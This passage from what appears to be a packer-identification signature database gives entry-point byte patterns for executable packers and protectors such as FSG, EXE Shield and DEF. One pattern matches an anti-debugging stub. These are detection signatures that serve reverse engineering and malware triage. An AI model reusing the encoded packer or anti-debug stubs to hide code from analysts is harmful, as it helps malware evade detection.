+signature = 60 E8 00 00 00 00 5D 81 ED 06 00 00 00 EB 05 B8 ?? ?? 42 00 64 A0 23 00 00 00 EB 03 C7 84 E8 84 C0 EB 03 C7 84 E9 75 67 B9 49 00 00 00 8D B5 C5 02 00 00 56 80 06 44 46 E2 FA 8B 8D C1 02 00 00 5E 55 51 6A 00 56 FF 95 0C 61 00 00 59 5D 40 85 C0 75 3C 80 3E 00 74 03 46 EB F8 46 E2 E3 8B C5 8B 4C 24 20 2B 85 BD 02 00 00 89 85 B9 02 00 00 80 BD B4 02 00 00 01 75 06 8B 8D 0C 61 00 00 89 8D B5 02 00 00 8D 85 0E 03 00 00 8B DD FF E0 55 68 10 10 00 00 8D 85 B4 00 00 00 50 8D 85 B4 01 00 00 50 6A 00 FF 95 18 61 00 00 5D 6A FF FF 95 10 61 00 00 44 65 62 75 67 67 65 72 20 6F 72 20 74 6F 6F 6C 20 66 6F 72 20 6D 6F 6E 69 74 6F 72 69 6E 67 20 64 65 74 65 63 74 65 64 21 21 21 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ep_only = true
+
+[Video-Lan-Client -> (UnknownCompiler)]
+signature = 55 89 E5 83 EC 08 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? FF FF ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? 00
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0)]
+signature = 03 DE EB 01 F8 B8 80 ?? 42 00 EB 02 CD 20 68 17 A0 B3 AB EB 01 E8 59 0F B6 DB 68 0B A1 B3 AB EB 02 CD 20 5E 80 CB AA 2B F1 EB 02 CD 20 43 0F BE 38 13 D6 80 C3 47 2B FE EB 01 F4 03 FE EB 02 4F 4E 81 EF 93 53 7C 3C 80 C3 29 81 F7 8A 8F 67 8B 80 C3 C7 2B FE EB 02 CD 20 57 EB 02 CD 20 5A 88 10 EB 02 CD 20 40 E8 02 00 00 00 C5 62 5A 4E E8 01 00 00 00 43 5A 2B DB 3B F3 75 B1 C1 F3 0D 92 B8 DC 0C 4E 0D B7 F7 0A 39 F4 B5 ?? ?? 36 FF 45 D9 FA FB FE FD FE CD 6B FE 82 0D 28 F3 B6 A6 A0 71 1F BA 92 9C EE DA FE 0D 47 DB 09 AE DF E3 F6 50 E4 12 9E C8 EC FB 4D EA 77 C9 03 75 E0 D2 D6 E5 E2 8B 41 B6 41 FA 70 B0 A0 AB F9 B5 C0 BF ED 78 25 CB 96 E5 A8 A7 AA A0 DC 5F 73 9D 14 F0 B5 6A 87 B7 3B E5 6D 77 B2 45 8C B9 96 95 A0 DC A2 1E 9C 9B 11 93 08 83 9B F8 9E 0A 8E 10 F7 85
+ep_only = true
+
+[FSG v1.20 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0)]
+signature = C1 E0 06 EB 02 CD 20 EB 01 27 EB 01 24 BE 80 ?? 42 00 49 EB 01 99 8D 1D F4 00 00 00 EB 01 5C F7 D8 1B CA EB 01 31 8A 16 80 E9 41 EB 01 C2 C1 E0 0A EB 01 A1 81 EA A8 8C 18 A1 34 46 E8 01 00 00 00 62 59 32 D3 C1 C9 02 EB 01 68 80 F2 1A 0F BE C9 F7 D1 2A D3 EB 02 42 C0 EB 01 08 88 16 80 F1 98 80 C9 28 46 91 EB 02 C0 55 4B EB 01 55 34 44 0B DB 75 AD E8 01 00 00 00 9D 59 0B C6 EB 01 6C E9 D2 C3 82 C2 03 C2 B2 82 C2 00 ?? ?? 7C C2 6F DA BC C2 C2 C2 CC 1C 3D CF 4C D8 84 D0 0C FD F0 42 77 0D 66 F1 AC C1 DE CE 97 BA D7 EB C3 AE DE 91 AA D5 02 0D 1E EE 3F 23 77 C4 01 72 12 C1 0E 1E 14 82 37 AB 39 01 88 C9 DE CA 07 C2 C2 C2 17 79 49 B2 DA 0A C2 C2 C2 A9 EA 6E 91 AA 2E 03 CF 7B 9F CE 51 FA 6D A2 AA 56 8A E4 C2 C2 C2 07 C2 47 C2 C2 17 B8 42 C6 8D 31 88 45 BA 3D 2B BC
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (MASM32 / TASM32)]
+signature = 03 F7 23 FE 33 FB EB 02 CD 20 BB 80 ?? 40 00 EB 01 86 EB 01 90 B8 F4 00 00 00 83 EE 05 2B F2 81 F6 EE 00 00 00 EB 02 CD 20 8A 0B E8 02 00 00 00 A9 54 5E C1 EE 07 F7 D7 EB 01 DE 81 E9 B7 96 A0 C4 EB 01 6B EB 02 CD 20 80 E9 4B C1 CF 08 EB 01 71 80 E9 1C EB 02 F0 49 C1 F6 09 88 0B F7 DE 0F B6 F2 43 EB 02 CD 20 C1 E7 0A 48 EB 01 89 C1 E7 14 2B FF 3B C7 75 A8 E8 01 00 00 00 81 5F F7 D7 D9 EE 1F 5E 1E DD 1E 2E 5E 1E DC ?? ?? 5E 1E 71 06 28 1E 1E 1E 20 F0 93 23 A8 34 64 30 F0 E1 D0 9E 51 F9 C2 D1 20 1D 32 42 91 16 51 E7 1D 32 42 91 36 51 DE 1D 32 42 91 3F D1 20 5F CE 2E 1D 32 42 30 DE 91 17 93 5D C8 09 FA 06 61 1E 1E 1E 49 E9 93 2E 06 56 1E 1E 1E 09 46 CA EF 06 92 5F 31 E7 09 3A AF 66 DF FE 26 CA 06 40 1E 1E 1E 5B 1E 9B 1E 1E 91 28 9E 1A 23 91 24 A1 16 9D 95 20
+ep_only = true
+
+[FSG v1.20 (Eng) -> dulek/xt -> (MASM32 / TASM32)]
+signature = 33 C2 2C FB 8D 3D 7E 45 B4 80 E8 02 00 00 00 8A 45 58 68 02 ?? 8C 7F EB 02 CD 20 5E 80 C9 16 03 F7 EB 02 40 B0 68 F4 00 00 00 80 F1 2C 5B C1 E9 05 0F B6 C9 8A 16 0F B6 C9 0F BF C7 2A D3 E8 02 00 00 00 99 4C 58 80 EA 53 C1 C9 16 2A D3 E8 02 00 00 00 9D CE 58 80 EA 33 C1 E1 12 32 D3 48 80 C2 26 EB 02 CD 20 88 16 F7 D8 46 EB 01 C0 4B 40 8D 0D 00 00 00 00 3B D9 75 B7 EB 01 14 EB 01 0A CF C5 93 53 90 DA 96 67 54 8D CC ?? ?? 51 8E 18 74 53 82 83 80 47 B4 D2 41 FB 64 31 6A AF 7D 89 BC 0A 91 D7 83 37 39 43 50 A2 32 DC 81 32 3A 4B 97 3D D9 63 1F 55 42 F0 45 32 60 9A 28 51 61 4B 38 4B 12 E4 49 C4 99 09 47 F9 42 8C 48 51 4E 70 CF B8 12 2B 78 09 06 07 17 55 D6 EA 10 8D 3F 28 E5 02 0E A2 58 B8 D6 0F A8 E5 10 EB E8 F1 23 EF 61 E5 E2 54 EA A9 2A 22 AF 17 A1 23 97 9A 1C
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0 / 7.0)]
+signature = 0B D0 8B DA E8 02 00 00 00 40 A0 5A EB 01 9D B8 80 ?? ?? 00 EB 02 CD 20 03 D3 8D 35 F4 00 00 00 EB 01 35 EB 01 88 80 CA 7C 80 F3 74 8B 38 EB 02 AC BA 03 DB E8 01 00 00 00 A5 5B C1 C2 0B 81 C7 DA 10 0A 4E EB 01 08 2B D1 83 EF 14 EB 02 CD 20 33 D3 83 EF 27 EB 02 82 53 EB 02 CD 20 87 FA 88 10 80 F3 CA EB 02 CD 20 40 03 D7 0B D0 4E 1B D2 EB 02 CD 20 2B D2 3B F2 75 AC F7 DA 80 C3 AF 91 1C 31 62 A1 61 20 61 71 A1 61 1F ?? ?? ?? 61 B4 49 6B 61 61 61 63 33 D6 66 EB 77 A7 73 33 24 13 E1 94 3C 05 14 63 60 75 85 D4 59 94 2A 60 75 85 D4 79 94 21 60 75 85 D4 82 14 63 A2 11 71 60 75 85 73 21 D4 5A D6 A0 0B 4C 3D 49 A4 61 61 61 8C 2C D6 71 49 99 61 61 61 4C 89 0D 32 49 D5 A2 74 2A 4C 7D F2 A9 22 41 69 0D 49 83 61 61 61 9E 61 DE 61 61 D4 6B E1 5D 66 D4 67 E4 59 E0 D8 63
+ep_only = true
+
+[FSG v1.20 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0 / 7.0)]
+signature = EB 02 CD 20 EB 01 91 8D 35 80 ?? ?? 00 33 C2 68 83 93 7E 7D 0C A4 5B 23 C3 68 77 93 7E 7D EB 01 FA 5F E8 02 00 00 00 F7 FB 58 33 DF EB 01 3F E8 02 00 00 00 11 88 58 0F B6 16 EB 02 CD 20 EB 02 86 2F 2A D3 EB 02 CD 20 80 EA 2F EB 01 52 32 D3 80 E9 CD 80 EA 73 8B CF 81 C2 96 44 EB 04 EB 02 CD 20 88 16 E8 02 00 00 00 44 A2 59 46 E8 01 00 00 00 AD 59 4B 80 C1 13 83 FB 00 75 B2 F7 D9 96 8F 80 4D 0C 4C 91 50 1C 0C 50 8A ?? ?? ?? 50 E9 34 16 50 4C 4C 0E 7E 9B 49 C6 32 02 3E 7E 7B 5E 8C C5 6B 50 3F 0E 0F 38 C8 95 18 D1 65 11 2C B8 87 28 C3 4C 0B 3C AC D9 2D 15 4E 8F 1C 40 4F 28 98 3E 10 C1 45 DB 8F 06 3F EC 48 61 4C 50 50 81 DF C3 20 34 84 10 10 0C 1F 68 DC FF 24 8C 4D 29 F5 1D 2C BF 74 CF F0 24 C0 08 2E 0C 0C 10 51 0C 91 10 10 81 16 D0 54 4B D7 42 C3 54 CB C9 4E
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0 / 7.0)]
+signature = F7 DB 80 EA BF B9 2F 40 67 BA EB 01 01 68 AF ?? A7 BA 80 EA 9D 58 C1 C2 09 2B C1 8B D7 68
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0 / 7.0)]
+signature = F7 D8 40 49 EB 02 E0 0A 8D 35 80 ?? ?? ?? 0F B6 C2 EB 01 9C 8D 1D F4 00 00 00 EB 01 3C 80
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0 / 7.0)]
+signature = 87 FE E8 02 00 00 00 98 CC 5F BB 80 ?? ?? 00 EB 02 CD 20 68 F4 00 00 00 E8 01 00 00 00 E3
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Borland Delphi / Microsoft Visual C++)]
+signature = 1B DB E8 02 00 00 00 1A 0D 5B 68 80 ?? ?? 00 E8 01 00 00 00 EA 5A 58 EB 02 CD 20 68 F4 00 00 00 EB 02 CD 20 5E 0F B6 D0 80 CA 5C 8B 38 EB 01 35 EB 02 DC 97 81 EF F7 65 17 43 E8 02 00 00 00 97 CB 5B 81 C7 B2 8B A1 0C 8B D1 83 EF 17 EB 02 0C 65 83 EF 43 13 D6 83 C7 32 F7 DA 03 FE EB 02 CD 20 87 FA 88 10 EB 02 CD 20 40 E8 02 00 00 00 F1 F8 5B 4E 2B D2 85 F6 75 AF EB 02 DE 09 EB 01 EF 34 4A 7C BC 7D 3D 7F 90 C1 82 41 ?? ?? ?? 87 DB 71 94 8B 8C 8D 90 61 05 96 1C A9 DA A7 68 5A 4A 19 CD 76 40 50 A0 9E B4 C5 15 9B D7 6E A5 BB CC 1C C2 DE 6C AC C2 D3 23 D2 65 B5 F5 65 C6 B6 CC DD CC 7B 2F B6 33 FE 6A AC 9E AB 07 C5 C6 C7 F3 94 3F DB B4 05 CE CF D0 BC FA 7F A5 BD 4A 18 EB A2 C5 F7 6D 25 9F BF E8 8D CA 05 E4 E5 E6 24 E8 66 EA EB 5F F7 6E EB F5 64 F8 76 EC 74 6D F9
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Borland Delphi / Microsoft Visual C++)]
+signature = C1 C8 10 EB 01 0F BF 03 74 66 77 C1 E9 1D 68 83 ?? ?? 77 EB 02 CD 20 5E EB 02 CD 20 2B F7
+ep_only = true
+
+[FSG v1.20 (Eng) -> dulek/xt -> (Borland Delphi / Microsoft Visual C++)]
+signature = 0F B6 D0 E8 01 00 00 00 0C 5A B8 80 ?? ?? 00 EB 02 00 DE 8D 35 F4 00 00 00 F7 D2 EB 02 0E EA 8B 38 EB 01 A0 C1 F3 11 81 EF 84 88 F4 4C EB 02 CD 20 83 F7 22 87 D3 33 FE C1 C3 19 83 F7 26 E8 02 00 00 00 BC DE 5A 81 EF F7 EF 6F 18 EB 02 CD 20 83 EF 7F EB 01 F7 2B FE EB 01 7F 81 EF DF 30 90 1E EB 02 CD 20 87 FA 88 10 80 EA 03 40 EB 01 20 4E EB 01 3D 83 FE 00 75 A2 EB 02 CD 20 EB 01 C3 78 73 42 F7 35 6C 2D 3F ED 33 97 ?? ?? ?? 5D F0 45 29 55 57 55 71 63 02 72 E9 1F 2D 67 B1 C0 91 FD 10 58 A3 90 71 6C 83 11 E0 5D 20 AE 5C 71 83 D0 7B 10 97 54 17 11 C0 0E 00 33 76 85 33 3C 33 21 31 F5 50 CE 56 6C 89 C8 F7 CD 70 D5 E3 DD 08 E8 4E 25 FF 0D F3 ED EF C8 0B 89 A6 CD 77 42 F0 A6 C8 19 66 3D B2 CD E7 89 CB 13 D7 D5 E3 1E DF 5A E3 D5 50 DF B3 39 32 C0 2D B0 3F B4 B4 43
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Borland C++)]
+signature = 23 CA EB 02 5A 0D E8 02 00 00 00 6A 35 58 C1 C9 10 BE 80 ?? ?? 00 0F B6 C9 EB 02 CD 20 BB F4 00 00 00 EB 02 04 FA EB 01 FA EB 01 5F EB 02 CD 20 8A 16 EB 02 11 31 80 E9 31 EB 02 30 11 C1 E9 11 80 EA 04 EB 02 F0 EA 33 CB 81 EA AB AB 19 08 04 D5 03 C2 80 EA 33 0F B6 C9 0F BE 0E 88 16 EB 01 5F EB 01 6B 46 EB 01 6D 0F BE C0 4B EB 02 CD 20 0F BE C9 2B C9 3B D9 75 B0 EB 01 99 C1 C1 05 91 9D B2 E3 22 E2 A1 E2 F2 22 E2 A0 ?? ?? ?? E2 35 CA EC E2 E2 E2 E4 B4 57 E7 6C F8 28 F4 B4 A5 94 62 15 BD 86 95 E4 E1 F6 06 55 DA 15 AB E1 F6 06 55 FA 15 A2 E1 F6 06 55 03 95 E4 23 92 F2 E1 F6 06 F4 A2 55 DB 57 21 8C CD BE CA 25 E2 E2 E2 0D AD 57 F2 CA 1A E2 E2 E2 CD 0A 8E B3 CA 56 23 F5 AB CD FE 73 2A A3 C2 EA 8E CA 04 E2 E2 E2 1F E2 5F E2 E2 55 EC 62 DE E7 55 E8 65 DA 61 59 E4
+ep_only = true
+
+[FSG v1.20 (Eng) -> dulek/xt -> (Borland C++)]
+signature = C1 F0 07 EB 02 CD 20 BE 80 ?? ?? 00 1B C6 8D 1D F4 00 00 00 0F B6 06 EB 02 CD 20 8A 16 0F B6 C3 E8 01 00 00 00 DC 59 80 EA 37 EB 02 CD 20 2A D3 EB 02 CD 20 80 EA 73 1B CF 32 D3 C1 C8 0E 80 EA 23 0F B6 C9 02 D3 EB 01 B5 02 D3 EB 02 DB 5B 81 C2 F6 56 7B F6 EB 02 56 7B 2A D3 E8 01 00 00 00 ED 58 88 16 13 C3 46 EB 02 CD 20 4B EB 02 CD 20 2B C9 3B D9 75 A1 E8 02 00 00 00 D7 6B 58 EB 00 9E 96 6A 28 67 AB 69 54 03 3E 7F ?? ?? ?? 31 0D 63 44 35 38 37 18 87 9F 10 8C 37 C6 41 80 4C 5E 8B DB 60 4C 3A 28 08 30 BF 93 05 D1 58 13 2D B8 86 AE C8 58 16 A6 95 C5 94 03 33 6F FF 92 20 98 87 9C E5 B9 20 B5 68 DE 16 4A 15 C1 7F 72 71 65 3E A9 85 20 AF 5A 59 54 26 66 E9 3F 27 DE 8E 7D 34 53 61 F7 AF 09 29 5C F7 36 83 60 5F 52 92 5C D0 56 55 C9 61 7A FD EF 7E E8 70 F8 6E 7B EF
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Borland Delphi / Borland C++)]
+signature = 2B C2 E8 02 00 00 00 95 4A 59 8D 3D 52 F1 2A E8 C1 C8 1C BE 2E ?? ?? 18 EB 02 AB A0 03 F7 EB 02 CD 20 68 F4 00 00 00 0B C7 5B 03 CB 8A 06 8A 16 E8 02 00 00 00 8D 46 59 EB 01 A4 02 D3 EB 02 CD 20 02 D3 E8 02 00 00 00 57 AB 58 81 C2 AA 87 AC B9 0F BE C9 80 EA 0F E8 01 00 00 00 64 59 02 D3 EB 02 D6 5C 88 16 EB 02 CD 20 46 E8 02 00 00 00 6B B5 59 4B 0F B7 C6 0B DB 75 B1 EB 02 50 AA 91 44 5C 90 D2 95 57 9B AE E1 A4 65 ?? ?? ?? B3 09 A1 C6 BF C2 C5 CA 9D 43 D6 5E ED 20 EF B2 A6 98 69 1F CA 96 A8 FA FA 12 25 77 FF 3D D6 0F 27 3A 8C 34 52 E2 24 3C 4F A1 52 E7 39 7B ED 50 42 5A 6D 5E 0F C5 4E CD 9A 08 4C 40 4F AD 6D 70 73 A1 44 F1 8F 6A BD 88 8B 8E 7C BC 43 6B 85 14 E4 B9 72 97 CB 43 FD 79 9B C6 6D AC E9 CA CD D0 10 D6 56 DC DF 55 EF 68 E7 F3 64 FA 7A F2 7C 77 05
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Borland Delphi / Borland C++)]
+signature = EB 01 2E EB 02 A5 55 BB 80 ?? ?? 00 87 FE 8D 05 AA CE E0 63 EB 01 75 BA 5E CE E0 63 EB 02
+ep_only = true
+
+[FSG v1.20 (Eng) -> dulek/xt -> (Borland Delphi / Borland C++)]
+signature = 0F BE C1 EB 01 0E 8D 35 C3 BE B6 22 F7 D1 68 43 ?? ?? 22 EB 02 B5 15 5F C1 F1 15 33 F7 80 E9 F9 BB F4 00 00 00 EB 02 8F D0 EB 02 08 AD 8A 16 2B C7 1B C7 80 C2 7A 41 80 EA 10 EB 01 3C 81 EA CF AE F1 AA EB 01 EC 81 EA BB C6 AB EE 2C E3 32 D3 0B CB 81 EA AB EE 90 14 2C 77 2A D3 EB 01 87 2A D3 E8 01 00 00 00 92 59 88 16 EB 02 52 08 46 EB 02 CD 20 4B 80 F1 C2 85 DB 75 AE C1 E0 04 EB 00 DA B2 82 5C 9B C7 89 98 4F 8A F7 ?? ?? ?? B1 4D DF B8 AD AC AB D4 07 27 D4 50 CF 9A D5 1C EC F2 27 77 18 40 4E A4 A8 B4 CB 9F 1D D9 EC 1F AD BC 82 AA C0 4C 0A A2 15 45 18 8F BB 07 93 BE C0 BC A3 B0 9D 51 D4 F1 08 22 62 96 6D 09 73 7E 71 A5 3A E5 7D 94 A3 96 99 98 72 B2 31 57 7B FA AE 9D 28 4F 99 EF A3 25 49 60 03 42 8B 54 53 5E 92 50 D4 52 4D C1 55 76 FD F7 8A FC 78 0C 82 87 0F
+ep_only = true
+
+[DEF v1.00 (Eng) -> bart/xt]
+signature = BE ?? 01 40 00 6A ?? 59 80 7E 07 00 74 11 8B 46 0C 05 00 00 40 00 8B 56 10 30 10 40 4A 75 FA 83 C6 28 E2 E4 68 ?? ?? 40 00 C3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ep_only = true
+
+[EXE Shield v0.1b - v0.3b, v0.3 -> SMoKE]
+signature = E8 04 00 00 00 83 60 EB 0C 5D EB 05
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Borland Delphi / Microsoft Visual C++ / ASM)]
+signature = EB 02 CD 20 EB 02 CD 20 EB 02 CD 20 C1 E6 18 BB 80 ?? ?? 00 EB 02 82 B8 EB 01 10 8D 05 F4
+ep_only = true
+
+[FSG v1.10 (Eng) -> bart/xt -> WinRAR-SFX]
+signature = EB 01 02 EB 02 CD 20 B8 80 ?? 42 00 EB 01 55 BE F4 00 00 00 13 DF 13 D8 0F B6 38 D1 F3 F7
+ep_only = true
+
+[FSG v1.10 (Eng) -> bart/xt -> WinRAR-SFX]
+signature = 80 E9 A1 C1 C1 13 68 E4 16 75 46 C1 C1 05 5E EB 01 9D 68 64 86 37 46 EB 02 8C E0 5F F7 D0
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0 / 7.0 / ASM)]
+signature = E8 01 00 00 00 5A 5E E8 02 00 00 00 BA DD 5E 03 F2 EB 01 64 BB 80 ?? ?? 00 8B FA EB 01 A8
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0 / ASM)]
+signature = F7 D0 EB 02 CD 20 BE BB 74 1C FB EB 02 CD 20 BF 3B ?? ?? FB C1 C1 03 33 F7 EB 02 CD 20 68
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual Basic / MASM32)]
+signature = EB 02 09 94 0F B7 FF 68 80 ?? ?? 00 81 F6 8E 00 00 00 5B EB 02 11 C2 8D 05 F4 00 00 00 47
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual Basic 5.0 / 6.0)]
+signature = C1 CB 10 EB 01 0F B9 03 74 F6 EE 0F B6 D3 8D 05 83 ?? ?? EF 80 F3 F6 2B C1 EB 01 DE 68 77
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0 / 7.0)]
+signature = EB 02 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0)]
+signature = E8 01 00 00 00 0E 59 E8 01 00 00 00 58 58 BE 80 ?? ?? 00 EB 02 61 E9 68 F4 00 00 00 C1 C8
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0)]
+signature = F7 DB 80 EA BF B9 2F 40 67 BA EB 01 01 68 AF ?? ?? BA 80 EA 9D 58 C1 C2 09 2B C1 8B D7 68
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0)]
+signature = D1 E9 03 C0 68 80 ?? ?? 00 EB 02 CD 20 5E 40 BB F4 00 00 00 33 CA 2B C7 0F B6 16 EB 01 3E
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0)]
+signature = EB 02 AB 35 EB 02 B5 C6 8D 05 80 ?? ?? 00 C1 C2 11 BE F4 00 00 00 F7 DB F7 DB 0F BE 38 E8
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0)]
+signature = 03 DE EB 01 F8 B8 80 ?? 42 00 EB 02 CD 20 68 17 A0 B3 AB EB 01 E8 59 0F B6 DB 68 0B A1 B3
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (MASM32 / TASM32)]
+signature = 03 F7 23 FE 33 FB EB 02 CD 20 BB 80 ?? 40 00 EB 01 86 EB 01 90 B8 F4 00 00 00 83 EE 05 2B
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (MASM32 / TASM32 / Microsoft Visual Basic)]
+signature = F7 D8 0F BE C2 BE 80 ?? ?? 00 0F BE C9 BF 08 3B 65 07 EB 02 D8 29 BB EC C5 9A F8 EB 01 94
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0 / 7.0)]
+signature = F7 DB 80 EA BF B9 2F 40 67 BA EB 01 01 68 AF ?? A7 BA 80 EA 9D 58 C1 C2 09 2B C1 8B D7 68
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 4.x / LCC Win32 1.x)]
+signature = 2C 71 1B CA EB 01 2A EB 01 65 8D 35 80 ?? ?? 00 80 C9 84 80 C9 68 BB F4 00 00 00 EB 01 EB
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Borland Delphi / Borland C++)]
+signature = EB 01 2E EB 02 A5 55 BB 80 ?? ?? 00 87 FE 8D 05 AA CE E0 63 EB 01 75 BA 5E CE E0 63 EB 02
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Borland C++)]
+signature = 23 CA EB 02 5A 0D E8 02 00 00 00 6A 35 58 C1 C9 10 BE 80 ?? ?? 00 0F B6 C9 EB 02 CD 20 BB
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0 / 7.0)]
+signature = 87 FE E8 02 00 00 00 98 CC 5F BB 80 ?? ?? 00 EB 02 CD 20 68 F4 00 00 00 E8 01 00 00 00 E3
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0 / 7.0)]
+signature = F7 D8 40 49 EB 02 E0 0A 8D 35 80 ?? ?? ?? 0F B6 C2 EB 01 9C 8D 1D F4 00 00 00 EB 01 3C 80
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0 / 7.0)]
+signature = 0B D0 8B DA E8 02 00 00 00 40 A0 5A EB 01 9D B8 80 ?? ?? ?? EB 02 CD 20 03 D3 8D 35 F4 00
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0 / 7.0)]
+signature = 87 FE ?? 02 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0)]
+signature = 91 EB 02 CD 20 BF 50 BC 04 6F 91 BE D0 ?? ?? 6F EB 02 CD 20 2B F7 EB 02 F0 46 8D 1D F4 00
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 5.0 / 6.0)]
+signature = 33 D2 0F BE D2 EB 01 C7 EB 01 D8 8D 05 80 ?? ?? ?? EB 02 CD 20 EB 01 F8 BE F4 00 00 00 EB
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (MASM32)]
+signature = EB 01 DB E8 02 00 00 00 86 43 5E 8D 1D D0 75 CF 83 C1 EE 1D 68 50 ?? 8F 83 EB 02 3D 0F 5A
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Borland Delphi / Microsoft Visual C++)x]
+signature = 1B DB E8 02 00 00 00 1A 0D 5B 68 80 ?? ?? 00 E8 01 00 00 00 EA 5A 58 EB 02 CD 20 68 F4 00
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Borland Delphi / Borland C++)]
+signature = 2B C2 E8 02 00 00 00 95 4A 59 8D 3D 52 F1 2A E8 C1 C8 1C BE 2E ?? ?? 18 EB 02 AB A0 03 F7
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Borland Delphi / Microsoft Visual C++)]
+signature = C1 C8 10 EB 01 0F BF 03 74 66 77 C1 E9 1D 68 83 ?? ?? 77 EB 02 CD 20 5E EB 02 CD 20 2B F7
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0)]
+signature = C1 CE 10 C1 F6 0F 68 00 ?? ?? 00 2B FA 5B 23 F9 8D 15 80 ?? ?? 00 E8 01 00 00 00 B6 5E 0B
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0)]
+signature = EB 01 ?? EB ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0)]
+signature = EB 01 4D 83 F6 4C 68 80 ?? ?? 00 EB 02 CD 20 5B EB 01 23 68 48 1C 2B 3A E8 02 00 00 00 38
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Borland Delphi 2.0)]
+signature = EB 01 56 E8 02 00 00 00 B2 D9 59 68 80 ?? 41 00 E8 02 00 00 00 65 32 59 5E EB 02 CD 20 BB
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Borland C++ 1999)]
+signature = EB 02 CD 20 2B C8 68 80 ?? ?? 00 EB 02 1E BB 5E EB 02 CD 20 68 B1 2B 6E 37 40 5B 0F B6 C9
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0)]
